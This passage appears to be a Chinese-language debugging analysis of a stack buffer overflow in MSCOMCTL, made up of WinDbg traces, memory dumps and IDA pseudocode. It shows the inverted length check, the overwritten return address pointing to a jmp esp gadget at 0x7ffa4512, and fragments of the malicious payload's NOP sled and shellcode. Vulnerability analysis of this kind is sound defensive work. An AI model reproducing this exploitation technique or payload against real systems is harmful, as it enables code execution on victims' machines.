eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00000000

eip=275c890desp=00122454 ebp=00122464 iopl=0????????nv up ei ng nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000286

MSCOMCTL!DllGetClassObject+0x3a8d4:

275c890d3bc6??????????? cmp???? eax,esi

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00000000

eip=275c890fesp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8d6:

275c890f7c78??????????? jl????? MSCOMCTL!DllGetClassObject+0x3a950(275c8989) [br=0]

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00000000

eip=275c8911esp=00122454 ebp=00122464 iopl=0? ???????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8d8:

275c89118b7d10????????? mov???? edi,dword ptr [ebp+10h]ss:0023:00122474=00008282

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000edi=00008282

eip=275c8914esp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8db:

275c8914 397dfc?????????cmp???? dword ptr [ebp-4],ediss:0023:00122460=00008282

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c8917esp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8de:

275c89170f85beb40000??? jne???? MSCOMCTL!DllGetClassObject+0x45da2(275d3ddb) [br=0]

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c891desp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8e4:

275c891d 57????????????? push??? edi

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c891eesp=00122450 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8e5:

275c891e 56????????????? push??? esi

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c891fesp=0012244c ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8e6:

275c891fff3550ed6227??? push??? dword ptr[MSCOMCTL!DllUnregisterServer+0x2ec6d (2762ed50)] ds:0023:2762ed50=00150000

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c8925esp=00122448 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a8ec:

275c8925ff1568115827??? call??? dword ptr [MSCOMCTL+0x1168 (27581168)]ds:0023:27581168={ntdll!RtlAllocateHeap(7c9305d4)}

0:000> p

eax=001cd1f8ebx=07f80810 ecx=7c9306eb edx=00150608 esi=00000000 edi=00008282

eip=275c892besp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a8f2:

275c892b3bc6??????????? cmp???? eax,esi

0:000> p

eax=001cd1f8ebx=07f80810 ecx=7c9306eb edx=00150608 esi=00000000 edi=00008282

eip=275c892desp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a8f4:

275c892d89450c????????? mov???? dword ptr [ebp+0Ch],eax ss:0023:00122470=07f80810

0:000> p

eax=001cd1f8ebx=07f80810 ecx=7c9306eb edx=00150608 esi=00000000 edi=00008282

eip=275c8930esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a8f7:

275c89300f84afb40000??? je????? MSCOMCTL!DllGetClassObject+0x45dac(275d3de5) [br=0]

0:000> p

eax=001cd1f8ebx=07f80810 ecx=7c9306eb edx=00150608 esi=00000000 edi=00008282

eip=275c8936esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a8fd:

275c89368b0b??????????? mov???? ecx,dword ptr [ebx]? ds:0023:07f80810=769957d8

0:000> p

eax=001cd1f8ebx=07f80810 ecx=769957d8 edx=00150608 esi=00000000 edi=00008282

eip=275c8938esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a8ff:

275c8938 56????????????? push??? esi

0:000> p

eax=001cd1f8ebx=07f80810 ecx=769957d8 edx=00150608 esi=00000000 edi=00008282

eip=275c8939esp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a900:

275c8939 57????????????? push??? edi

0:000> p

eax=001cd1f8ebx=07f80810 ecx=769957d8 edx=00150608 esi=00000000 edi=00008282

eip=275c893aesp=0012244c ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a901:

275c893a 50????????????? push??? eax

0:000> p

eax=001cd1f8ebx=07f80810 ecx=769957d8 edx=00150608 esi=00000000 edi=00008282

eip=275c893besp=00122448 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a902:

275c893b 53????????????? push??? ebx

0:000> p

eax=001cd1f8ebx=07f80810 ecx=769957d8 edx=00150608 esi=00000000 edi=00008282

eip=275c893cesp=00122444 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a903:

275c893c ff510c?????????call??? dword ptr [ecx+0Ch]? ds:0023:769957e4=769d9f59

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c893fesp=00122454 ebp=00122464 iopl=0????????nv up ei ng nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000286

MSCOMCTL!DllGetClassObject+0x3a906:

275c893f8bf0??????????? mov???? esi,eax

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c8941esp=00122454 ebp=00122464 iopl=0????????nv up ei ng nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000286

MSCOMCTL!DllGetClassObject+0x3a908:

275c894185f6??????????? test??? esi,esi

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c8943esp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a90a:

275c89437c31??????????? jl? ????MSCOMCTL!DllGetClassObject+0x3a93d(275c8976) [br=0]

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=00000000 edi=00008282

eip=275c8945esp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a90c:

275c89458b750c????????? mov???? esi,dword ptr [ebp+0Ch]ss:0023:00122470=001cd1f8

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=001cd1f8 edi=00008282

eip=275c8948esp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a90f:

275c89488bcf??????????? mov???? ecx,edi

0:000> p

eax=00000000ebx=07f80810 ecx=00008282 edx=00000000 esi=001cd1f8 edi=00008282

eip=275c894aesp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a911:

275c894a8b7d08????????? mov???? edi,dword ptr [ebp+8]ss:0023:0012246c=00122490

0:000> p

eax=00000000ebx=07f80810 ecx=00008282 edx=00000000 esi=001cd1f8 edi=00122490

eip=275c894desp=00122454 ebp=00122464 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

//下面是memcpy的翻版

MSCOMCTL!DllGetClassObject+0x3a914:

275c894d8bc1??????????? mov???? eax,ecx

0:000> p

eax=00008282ebx=07f80810 ecx=00008282 edx=00000000 esi=001cd1f8 edi=00122490

eip=275c894f esp=00122454ebp=00122464 iopl=0???????? nv up ei plzr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3a916:

275c894fc1e902????????? shr???? ecx,2

0:000> p

eax=00008282ebx=07f80810ecx=000020a0edx=00000000 esi=001cd1f8edi=00122490

eip=275c8952esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na pe cy

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000207

MSCOMCTL!DllGetClassObject+0x3a919:

275c8952 f3a5???????????rep movs dword ptr es:[edi],dword ptr[esi] es:0023:00122490=001a14f0 ds:0023:001cd1f8=00000000//就是此處造成了溢出

0:000> db esp

00122454? 00 00 00 00 04 14 1a 00-10 08 f8 07 82 82 0000? ................

00122464? 98 24 12 00 91 8b 5c 27-90 24 12 00 f8 d1 1c00? .$....\'.$......

00122474? 82 82 00 00 00 00 00 00-04 14 1a 00 10 08 f807? ................

00122484? 43 6f 62 6a 64 00 00 00-82 82 00 00 f0 14 1a 00? Cobjd...........//藍(lán)色的是第一次調(diào)用B函數(shù)傳入棧里的

00122494? b5 b7 58 27 c0 24 12 00-2b 74 5e 27 04 14 1a00? ..X'.$..+t^'....

001224a4? 10 08 f8 07 00 00 00 00-e0 13 1a 00 28 10 1a00? ............(...

001224b4? 47 74 5b 27 01 00 00 00-e0 24 12 00 e0 24 1200? Gt['.....$...$..

001224c4? 72 77 5e 27 04 14 1a 00-10 08 f8 07 10 08 f807? rw^'............

001224d4 ?49 74 6d 73 64 00 00 00-00 00 58 27 60 25 1200? Itmsd.....X'`%..

001224e4? 4e a6 5c 27 20 12 1a 00-10 08 f8 07 78 10 1a00? N.\' .......x...

001224f4? 28 10 1a 00 40 eb b2 06-01 ef cd ab 00 00 0500? (...@...........

00122504? 98 5d 65 01 07 00 00 00-08 00 00 80 05 00 0080? .]e.............

00122514? 00 00 00 00 b0 28 58 27-00 00 00 00 db 09 0135? .....(X'.......5

00122524? 7f 28 58 27 00 e0 62 27-40 eb b2 06 28 28 5827? .(X'..b'@...((X'

00122534? b0 10 1a 00 10 08 f8 07-00 00 00 00 4e 08 7deb? ............N.}.

00122544? 01 00 06 00 1c 00 00 00-00 00 00 00 00 00 0000? ................

0:000> p

eax=00008282ebx=07f80810 ecx=00000000 edx=00000000 esi=001d5478 edi=0012a710

eip=275c8954esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na pe cy

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000207

MSCOMCTL!DllGetClassObject+0x3a91b:

275c89548bc8??????????? mov???? ecx,eax

0:000> db esp

00122454? 00 00 00 00 04 14 1a 00-10 08 f8 07 82 82 0000? ................

00122464 ?98 24 12 00 91 8b 5c 27-90 24 12 00 f8 d1 1c00? .$....\'.$......

00122474? 82 82 00 00 00 00 00 00-04 14 1a 00 10 08 f807? ................

00122484? 43 6f 62 6a 64 00 00 00-82 82 00 0000 00 00 00? Cobjd...........? //綠色的是被覆蓋后的數(shù)據(jù)

00122494?00 00 00 00 00 00 00 00-12 45 fa 7f 90 90 9090? .........E......

001224a4?90 90 90 90 8b c4 05 10-01 00 00 c7 00 24 034d? .............$.M

001224b4?08 e9 5a 00 00 00 6b 65-72 6e 65 6c 33 32 00df? ..Z...kernel32..

001224c4?2d 89 8c 1b 81 7d ef 42-9d 85 85 d6 4e 99 595a? -....}.B....N.YZ

0:000> t

eax=00008282ebx=07f80810 ecx=00008282 edx=00000000 esi=001d5478 edi=0012a710

eip=275c8956esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na pe cy

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000207

MSCOMCTL!DllGetClassObject+0x3a91d:

275c89568b4510????????? mov???? eax,dword ptr [ebp+10h]ss:0023:00122474=00008282

0:000> t

eax=00008282ebx=07f80810 ecx=00008282 edx=00000000 esi=001d5478 edi=0012a710

eip=275c8959esp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na pe cy

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000207

MSCOMCTL!DllGetClassObject+0x3a920:

275c8959 83e103?????????and???? ecx,3

0:000> t

eax=00008282ebx=07f80810 ecx=00000002 edx=00000000 esi=001d5478 edi=0012a710

eip=275c895cesp=00122454 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a923:

275c895c6a00??????????? push??? 0

0:000> t

eax=00008282ebx=07f80810 ecx=00000002 edx=00000000 esi=001d5478 edi=0012a710

eip=275c895eesp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a925:

275c895e8d5003????????? lea???? edx,[eax+3]

0:000> t

eax=00008282ebx=07f80810 ecx=00000002 edx=00008285 esi=001d5478 edi=0012a710

eip=275c8961esp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023 ?es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a928:

275c896183e2fc????????? and???? edx,0FFFFFFFCh

0:000> t

eax=00008282ebx=07f80810 ecx=00000002 edx=00008284 esi=001d5478 edi=0012a710

eip=275c8964esp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000206

MSCOMCTL!DllGetClassObject+0x3a92b:

275c89642bd0??????????? sub???? edx,eax

0:000> t

eax=00008282ebx=07f80810 ecx=00000002 edx=00000002 esi=001d5478 edi=0012a710

eip=275c8966esp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a92d:

275c8966 f3a4???????????rep movs byte ptr es:[edi],byte ptr[esi] es:0023:0012a710=00 ds:0023:001d5478=ee

0:000> p

eax=00008282ebx=07f80810 ecx=00000000 edx=00000002 esi=001d547a edi=0012a712

eip=275c8968esp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023 ?ds=0023?es=0023? fs=003b? gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a92f:

275c89688b0b??????????? mov???? ecx,dword ptr [ebx]? ds:0023:07f80810=769957d8

0:000> p

eax=00008282ebx=07f80810 ecx=769957d8 edx=00000002 esi=001d547a edi=0012a712

eip=275c896aesp=00122450 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a931:

275c896a 52????????????? push??? edx

0:000> p

eax=00008282ebx=07f80810 ecx=769957d8 edx=00000002 esi=001d547a edi=0012a712

eip=275c896besp=0012244c ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a932:

275c896b68783f6327????? push??? offset MSCOMCTL!DllUnregisterServer+0x33e95(27633f78)

0:000> p

eax=00008282ebx=07f80810 ecx=769957d8 edx=00000002 esi=001d547a edi=0012a712

eip=275c8970esp=00122448 ebp=00122464 iopl=0????????nv up ei pl nz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a937:

275c8970 53????????????? push??? ebx

0:000> p

eax=00008282ebx=07f80810 ecx=769957d8 edx=00000002 esi=001d547a edi=0012a712

eip=275c8971 esp=00122444ebp=00122464 iopl=0???????? nv up ei plnz na po nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000202

MSCOMCTL!DllGetClassObject+0x3a938:

275c8971ff510c????????? call??? dword ptr [ecx+0Ch]? ds:0023:769957e4=769d9f59

0:000> p

eax=00000000ebx=07f80810 ecx=06cf0000 edx=00000000 esi=001d547a edi=0012a712

eip=275c8974esp=00122454 ebp=00122464 iopl=0????????nv up ei ng nz na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000286

MSCOMCTL!DllGetClassObject+0x3a951:

275c898a 5e????????????? pop???? esi

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c898besp=0012245c ebp=00122464 iopl=0????????nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023 ?es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3a952:

275c898b 5b????????????? pop???? ebx

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c898cesp=00122460 ebp=00122464 iopl=0????????nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3a953:

275c898c c9????????????? leave

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c898desp=00122468 ebp=00122498 iopl=0????????nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3a954:

275c898d c3????????????? ret

//==========================================================================//

B函數(shù)執(zhí)行完畢,返回至A函數(shù):

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c8b91 esp=0012246c ebp=00122498iopl=0???????? nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3ab58:

275c8b918bf0??????????? mov???? esi,eax

0:000> t

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b93esp=0012246c ebp=00122498 iopl=0????????nv up ei ng nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000296

MSCOMCTL!DllGetClassObject+0x3ab5a:

275c8b9383c40c????????? add???? esp,0Ch

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b96 esp=00122478 ebp=00122498iopl=0???????? nv up ei pl nz ac pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000216

MSCOMCTL!DllGetClassObject+0x3ab5d:

275c8b9685f6??????????? test??? esi,esi

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b98esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab5f:

275c8b987c3d??????????? jl????? MSCOMCTL!DllGetClassObject+0x3ab9e(275c8bd7) [br=0]

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b9aesp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab61:

275c8b9a 837df800???????cmp????dword ptr [ebp-8],0?ss:0023:00122490=00000000

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8b9eesp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab65:

275c8b9e8b7d08????????? mov???? edi,dword ptr [ebp+8]ss:0023:001224a0=90909090

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8ba1esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab68:

275c8ba1 742a???????????je????? MSCOMCTL!DllGetClassObject+0x3ab94(275c8bcd) [br=1]

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bcdesp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab94:

275c8bcd 837dfc00???????cmp????dword ptr [ebp-4],0?ss:0023:00122494=00000000

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bd1esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab98:

275c8bd10f85a6a20000??? jne???? MSCOMCTL!DllGetClassObject+0x44e44(275d2e7d) [br=0]

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bd7esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3ab9e:

275c8bd7 8bc6??????????? mov???? eax,esi

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=90909090

eip=275c8bd9esp=00122478 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000????????? ???efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba0:

275c8bd9 5f?????????????pop???? edi

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=00000000 edi=00000000

eip=275c8bdaesp=0012247c ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba1:

275c8bda 5e?????????????pop???? esi

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c8bdbesp=00122480 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba2:

275c8bdb 5b?????????????pop???? ebx

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c8bdcesp=00122484 ebp=00122498 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba3:

275c8bdc c9?????????????leave

0:000> p

eax=00000000ebx=07f80810 ecx=7c93056d edx=00150608 esi=001a1404 edi=00000000

eip=275c8bddesp=0012249c ebp=00000000 iopl=0????????nv up ei pl zr na pe nc

cs=001b? ss=0023?ds=0023? es=0023? fs=003b?gs=0000???????????? efl=00000246

MSCOMCTL!DllGetClassObject+0x3aba4:

275c8bddc20800????????? ret???? 8

Esp

0012246c 90 2412 00? .$.. //返回時(shí)ESP=0x0012246c

00122470 f8 d11c 00? ....

00122474 82 8200 00? ....

00122478 00 0000 00? .... //add????esp,0Chesp=0x122478

0012247c 04 141a 00? ....// pop edi

00122480 10 08f8 07? ....// pop esi

00122484 43 6f62 6a? Cobj //pop ebx

00122488 64 0000 00? d...

0012248c 82 8200 00? ....

00122490 00 0000 00? ....

00122494 00 0000 00? ....

00122498 00 0000 00? ....

0012249c 12 45 fa 7f? .E..//LEAVE后,esp指向此處

001224a0 90 9090 90? ....

001224a4 90 9090 90? ....

001224a8 8b c405 10? ....//ret 8后,esp指向此處,jmp esp后,eip將指向這里

001224ac 01 0000 c7? ....

看到熟悉的0x7FFA4512了吧,該地址處有一條jmpesp的指令。這樣控制權(quán)就轉(zhuǎn)移到棧當(dāng)中去了。

總結(jié)一下:

MSCOMCTL!DllGetClassObject+0x3ab15(275c8b4e)A函數(shù))僅僅開辟了0x14h大小的??臻g里邊兩次調(diào)用了函數(shù)MSCOMCTL!DllGetClassObject+0x3a8bb( B函數(shù))。第一次往A函數(shù)的棧幀里邊寫入了0xc大小的字節(jié),第二次調(diào)用前檢查了大小,本該是長度應(yīng)該小于等于8copy數(shù)據(jù),結(jié)果程序員的粗心大意寫成了大于等于8。直接導(dǎo)致第二次調(diào)用寫入了0x8282大小的數(shù)據(jù),其后果是很嚴(yán)重的——破壞掉了A函數(shù)的棧幀,導(dǎo)致A函數(shù)無法正確返回。此處返回地址被精心覆蓋成0x7ffa4512,直接導(dǎo)致了惡意代碼的執(zhí)行。

IDA反編譯還原出來的函數(shù)偽代碼如下:

函數(shù)A

int __stdcall sub_275C8B4E(int a1,void *lpMem)

{

? int result; // eax@1

? BSTR v3; // ebx@1

? int v4; // esi@4

? int v5; // [sp+Ch] [bp-14h]@1

? SIZE_T dwBytes; // [sp+14h] [bp-Ch]@3

? int v7; // [sp+18h] [bp-8h]@4

? int v8; // [sp+1Ch] [bp-4h]@8

?

? v3 = (BSTR)lpMem;

? result = sub_275C88F4((int)&v5, lpMem, 0xCu);? //第一次調(diào)用B,提取Magic

? if ( result >= 0 )

? {

??? if ( v5 == 0x6A626F43 && dwBytes >= 8 ) //條件本該是小于等于的,哈哈哈。。。

??? {

????? v4 = sub_275C88F4((int)&v7, v3, dwBytes);// 第二次調(diào)用B,提取數(shù)據(jù)到緩沖區(qū),因?yàn)槟康牡刂肥?/span>sub_275C8B4E

//的棧幀,位于sub_275C88F4棧幀下面,所以不會造成sub_275C88F4不能返回

????? if ( v4 >= 0 )

????? {

??????? if ( !v7 )

????????? goto LABEL_8;

??????? lpMem = 0;

??????? v4 = sub_275C8BE0((UINT)&lpMem,(int)v3);

??????? if ( v4 >= 0 )

??????? {

????????? sub_2758B9B8((BSTR)lpMem);

????????? SysFreeString((BSTR)lpMem);

LABEL_8:

????????? if ( v8 )

??????????? v4 = sub_275C8CB2(a1 + 20, v3);

????????? return v4;

??????? }

????? }

????? return v4;

??? }

??? result = 0x8000FFFFu;

? }

? return result;

}

第一次復(fù)制了0xc?? bytes

00122484 ???43 6f 62 6a 64 00 00 00 82 82? Cobjd.....?//43 6F 62 6A應(yīng)該是個(gè)Magic

0012248e ???00 00

第二次復(fù)制了0x8282?? bytes

00122490 ?00 00 00 00 00 00 00 00 00 00? ..........

0012249a ?00 00 12 45 fa 7f 90 90 90 90? ...E......

001224a4 ?90 90 90 90 8b c4 05 10 01 00? ..........

001224ae ?00 c7 00 24 03 4d 08 e9 5a 00? ...$.M..Z.

001224b8 ?00 00 6b 65 72 6e 65 6c 33 32? ..kernel32

001224c2 ?00 df 2d 89 8c 1b 81 7d ef 42? ..-....}.B

001224cc ?9d 85 85 d6 4e 99 59 5a 61 d8? ....N.YZa.

